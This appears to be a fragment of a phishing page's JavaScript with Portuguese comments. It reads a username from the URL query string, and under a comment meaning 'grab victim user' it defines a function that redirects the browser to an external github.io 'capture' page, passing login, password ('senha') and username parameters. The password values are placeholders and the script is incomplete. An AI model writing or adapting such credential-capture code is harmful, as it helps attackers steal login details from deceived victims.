var url   = window.location.search.replace("?", "");
var items = url.split("&");
var array = {
'usuario' : items[0],
}
str = array.usuario
var busca = "%20"; 
var strbusca = eval('/'+busca+'/g');
str2 = str.replace(strbusca, " ");
alert(str2);	


<!--------------------------------------------------------------->	
<!-- PEGA USUÁRIO VÍTIMA --><script type="text/javascript">
	var url   = window.location.search.replace("?", "");
	var items = url.split("&");
	var array = {
		'usuario' : items[0],
	};
	str = array.usuario;
	str2 = str.split('=');
	usuario = str2[1];
	
	//document.loginForm.action = 'nova URL';
	//document.getElementById("loginForm")		
	//a = "https://rodrigorochapinto.github.io/pages-teste/paginas/capitura.html?user=login&senha=senha&usuario="
	function enviar(){
		window.location.href = "https://rodrigorochapinto.github.io/pages-teste/paginas/capitura.html?user=login&senha=senha&usuario="+usuario
	}			
<!--------------------------------------------------------------->	